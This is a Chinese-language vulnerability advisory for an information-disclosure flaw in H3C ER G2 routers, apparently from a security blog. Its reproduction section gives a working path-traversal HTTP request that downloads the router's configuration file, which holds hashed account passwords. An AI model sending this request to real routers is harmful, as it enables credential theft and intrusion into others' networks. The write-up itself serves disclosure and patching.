声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
一、产品介绍
H3C ER2200G2是H3C推出的新一代高性能企业级路由器,采用全新硬件架构、具备丰富的软件功能、支持全面的安全策略。定位于以太网/光纤/xDSL接入的中小商业市场(SMB),可部署于需要高速Internet接入的政府机构、中小企业、餐饮连锁、酒店、学校、医院、网吧等网络环境。
二、漏洞介绍
H3C ER G2系列版本存在敏感信息泄露漏洞。攻击者通过actionpolicy_status跳转别的接口,利用该漏洞访问ER2200G2.cfg文件。
三、影响版本
| 漏洞名称 | H3C ER G2系列路由器敏感信息泄露漏洞 |
| 厂商 | 华三 |
| 危害等级 | 高危 |
四、漏洞复现
1.访问漏洞环境
2.Poc
GET /userLogin.asp/../actionpolicy_status/../ER2200G2.cfg HTTP/1.1
Host: xxxxxxxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: image/avif,image/webp,*/*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
请求该地址查看响应结果
此文件中还存在泄漏的账户密码信息。(此处为MD5加密)
五、修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://www.h3c.com/cn/Products___Technology/Products/Router/Catalog/ER/ER3200/
